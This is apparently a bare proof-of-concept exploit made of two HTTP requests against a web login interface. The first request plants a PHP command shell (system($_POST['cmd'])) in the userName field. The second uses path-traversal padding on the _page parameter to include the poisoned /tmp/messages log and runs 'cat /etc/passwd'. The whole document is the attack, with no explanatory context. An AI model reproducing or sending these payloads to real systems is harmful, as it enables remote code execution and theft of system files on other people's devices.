POST /login.php5 HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json
{
"login_auth": 0,
"miniHiveUI": 1,
"authselect": "Name/Password",
"userName": "<?php system($_POST['cmd']); exit(0);?>",
"password": "a"
}
POST /action.php5?_action=list&debug=true HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json
{
"_page": "a" + "/.."*8 + "/"*4041 + "/tmp/messages",
"cmd": cat /etc/passwd
}